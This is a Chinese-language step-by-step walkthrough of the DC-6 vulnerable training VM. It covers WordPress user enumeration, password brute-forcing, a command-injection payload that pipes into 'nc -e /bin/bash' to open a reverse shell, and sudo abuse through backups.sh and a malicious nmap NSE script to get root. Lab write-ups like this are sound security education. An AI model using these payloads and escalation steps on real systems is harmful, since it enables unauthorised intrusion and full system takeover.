DC-6靶机渗透测试详细教程

  • 作者:
  • 时间:2022-10-22 17:15:54
简介 DC-6靶机渗透测试详细教程

DC-6教程

描述

DC-6 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。

这不是一个过于困难的挑战,所以应该非常适合初学者。

此挑战的最终目标是获得 root 权限并读取唯一的标志。

必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。

使用工具

攻击者:kali 192.168.110.4

靶机:DC-6 192.168.1.191

一、信息收集

0x01 查看存活主机和端口

由于主机和靶机不在同一个网段,这里我们直接使用nmap扫描ip地址和端口

nmap -PS 192.168.1.0/24

 

0x02 查看端口开放的服务

nmap -sV -T4 -O -p 80,22 192.168.1.191

 

0x03 查看主机指纹信息

whatweb http://192.168.1.191

 

0x04 访问靶机HTTP服务

发现浏览器找不到此网站(dns无法解析此ip)

 

添加“192.168.1.191 wordy”到host文件中(“C:\Windows\System32\drivers\etc\hosts”)

 

同样在kali的/etc/hosts文件下也加上此语句

vim /etc/hosts

 

在网站内随便点一下

 

发现这个地方点进去后有登录选项

 


 

二、漏洞发现

0x01 用户名枚举

wpscan --url http://wordy/ -e u

 

0x02 暴力破解用户名口令

将刚刚枚举到的用户名存储在桌面上的文本文档中

vim users.txt

 

暴力破解

wpscan --url http://wordy/ -U users.txt -P /usr/share/wordlists/rockyou.txt

 

使用dirb扫描出来管理员登录界面

dirb http://wordy/

 

打开登录界面输入账号密码登录

 


 

发现activity monitor插件

 

0x03 漏洞信息查询

尝试搜索此插件的漏洞信息

msfconsole
search activity monitor

 

查找到一个漏洞,查看使用手册

use exploit/unix/webapp/wp_plainview_activity_monitor_rce
show options

 

01 背景介绍 WordPress 插件Plainview Activity Monitor存在一个远程命令执行漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。
02 影响范围
Plainview Activity Monitor plugin version <= 20161228
03 利用方式 默认后台
wp-login.php Activity Monitor >tools 用命令执行
04 漏洞序号
CVE-2018-15877

查看漏洞文件

 

发现这个一个html文件,将html标签复制到一个文件上

vi 45274.html

 

三、漏洞利用

0x01 命令执行漏洞

尝试拼接命令

ping 192.168.1.191|ls

 


 


 

使用kali监听9999端口

nc -lvvp 9999

 

在网页框中输入

ping 192.168.110.4| nc -e /bin/bash 192.168.110.4 9999

然后点击Lookup

 

0x02getshell成功

可以看到我们已经拿到shell

 


 

0x03开启终端

python -c ‘import pty;pty.spawn("/bin/bash")’

开启一个python终端

 

四:提权

0x01查看用户信息

cd 到/home/mark目录下查看文件things-to-do 文档,查看

 

提示到有用户 graham的口令,尝试su graham切换用户,查看jens用户下文件信息,发现对backups.sh文件具有可执行权限,且以jens用户执行。尝试写入反弹终端命令并执行

 

查看jens用户下文件信息,发现对backups.sh文件具有可执行权限,且以jens用户执行。尝试写入反弹终端命令并执行

 

0x02转换身份

echo “/bin/bash” >> backups.sh
sudo -u jens ./backups.sh

尝试以jens身份执行此文件,发现切换成功

 

0x03 找到提权点

sudo -l 查看用户当前可执行的sudo命令,发现nmap命令执行时以root身份执行,尝试编写提权脚本

echo "os.execute('/bin/bash')">demon.nse

nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)

 

sudo nmap --script=/home/jens/demon.nse

执行此脚本

 

提权成功

 

进入到root,找到flag

cat /root/theflag.txt

 

DC-6总结

hosts定向

wpscan枚举账号(因为是WordPress博客)

wpscan账号密码爆破

dirb目录扫描得到admin登录地址

发现命令注入漏洞

使用burp抓包修改数据反弹shell

打开交互模式 python -c 'import pty;pty.spawn("/bin/bash")'

进入到home目录查看DC-6的用户目录

发现graham账号的密码,进行ssh登录成功

使用sudo -l查看权限

利用命令脚本转换到jens用户

发现可执行root的文件为nmap

创建一个nmap文件执行脚本

只想nmap文件执行脚本获取到root